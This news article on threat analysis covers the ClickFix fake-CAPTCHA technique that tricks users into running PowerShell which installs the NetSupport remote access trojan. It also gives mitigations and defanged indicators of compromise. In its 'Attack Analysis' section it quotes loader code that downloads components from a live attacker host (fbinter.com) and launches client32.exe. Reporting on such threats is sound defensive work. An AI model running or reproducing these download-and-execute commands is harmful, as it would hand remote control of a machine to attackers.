Cybersecurity experts have observed a significant increase in the use of the NetSupport Remote Access Trojan (RAT) in recent months, a malicious tool that allows attackers to gain full control over compromised systems.
This surge in activity has been linked to the “ClickFix” Initial Access Vector (IAV), a sophisticated social engineering technique that tricks users into executing malicious PowerShell commands.
NetSupport RAT, originally developed as a legitimate remote IT support tool in 1989, has been weaponized by cybercriminals to monitor screens, control keyboards and mice, upload and download files, and execute malicious commands.
If undetected, it can lead to severe consequences, including ransomware attacks, data breaches, and disruption of business operations.
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9JskfiHJT0nS9FG4Uv1US9PYIYjwiw_GWKsqCekauhzxtWhGCN7tjq8Dd4I9JeB8mOHssz9JC0StGQU704YOfYbjIG8JTBWTLhYsSjFHRCuEdRpo7Ai7CPtbhy1_MjU2VuS5rIiQQKUOfDQSIOzJfy3KazEGemzrAXZd7UWsHqdCckdv53H6o8N9StGU/s16000/ClickFix%20Fake%20Landing%20Page%20(Source%20-%20eSentire).webp)
The ClickFix technique involves injecting fake CAPTCHA pages on compromised websites, instructing users to copy and execute PowerShell commands.
These commands download and install the NetSupport RAT client, establishing Command-and-Control (C2) connections to attacker-controlled gateways.
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU5ypzy1IY9NMFnKXchezaDphNmxA8IIiEDO1fmRkHChre3FFZAdr3nAyRnMaRojbyqhTnkP9b0_KNdDerbBY1SVYkrHtEMzcBncUSgHHLjPUWJLgqjEXaC8A6HvUYQ2xgMqWKfQfzfUnTVhCarTfdd111UgnxFFlx6tQDgquQ99dceciF_LSNL8COvn4/s16000/Deployment%20of%20NetSupport%20RAT%20(Source%20-%20eSentire).webp)
While analysts at eSentire discovered that the RAT payloads are often hosted on URLs containing “.png” in the path, and the C2 gateway URLs frequently include “fakeurl.htm.”
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF5KQalhOl8n5CQPDhq6u4njI9HA7h2bym3c02x7opIUPQyX7jwcVcl54PlQQ-5rnxNVw44ZUtgRK1gRxuoo1Xf9YCuGmRXrp1u6g_I3b1Nifp3Bufm-pgEXC2VY1ebTUxRmalbrvoYQ6Y97xu3PsGSHXoem07b2CM-W4K4D3TuqPCtlfbTTuTSkyuR4I/s16000/NetSupport%20RAT%20Payload%20Hosting%20and%20C2%20(Source%20-%20eSentire).webp)
Attack Analysis
The PowerShell script used in ClickFix attacks typically involves the following steps:-
- Random Folder Creation:
$randomFolderName = -join ((65..90) + (97..122) | Get-Random -Count 6 | ForEach-Object {[char]$_})
$randomFolderPath = Join-Path -Path $env:APPDATA -ChildPath $randomFolderName
New-Item -ItemType Directory -Path $randomFolderPath
- Downloading RAT Components:-
$url = "http://fbinter.com/a/1.png"
$file = $randomFolderPath + "client32.ini"
Invoke-WebRequest $url -OutFile $file
Similar commands are used to download other components like client32.exe
and configuration files.
- Executing the RAT:-
$file12 = $randomFolderPath + "client32.exe"
Start-Process $file12
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRUMT6r3qrWEmvOdsrNn8RSdxR-ajV8byClFXpkfLRCsaKzOFQjXx6kuEujNTfI6342pcW90pTBPDKHJoN43BrSn-J9fPjHZuAqrNv6Fod4oS7a2OU1Qc6_IVZXwij9Pa0T0yIxa1fn85Fxe_zJPNZJDA_Jqc7SyxQiLR1CiXDQZm8yotwkAb7GvcuAIA/s16000/PowerShell%20Script%20Content%20(Source%20-%20eSentire).webp)
To protect against NetSupport RAT and ClickFix attacks, organizations should deploy Endpoint Detection and Response (EDR) agents on all corporate assets and conduct security awareness training to educate employees about emerging threats like ClickFix.
Even limiting the user permissions can help prevent unauthorized software installations.
Organizations should also enhance security by disabling the Run prompt and restricting WScript.exe and Mshta.exe using Group Policy Objects (GPO) or Windows Defender Application Control (WDAC).
Staying informed about the latest IOCs and implementing effective security controls is crucial for protecting against these sophisticated threats.
Indicators of Compromise (IOCs)
- ClickFix Pages:
- hxxp[://]eveverify[.]com/captcha[.]html
- hxxps[://]eiesoft.com/Ray-verify[.]html
- NetSupport RAT Payload Delivery:
- hxxp[://]fbinter[.]com/a/1[.]png
- hxxp[://]fbinter[.]com/a/2[.]png
- hxxp[://]fbinter[.]com/a/3[.]png
Are you from SOC/DFIR Team? - Join 500,000+ Researchers to Analyze Cyber Threats with ANY.RUN Sandbox - Try for Free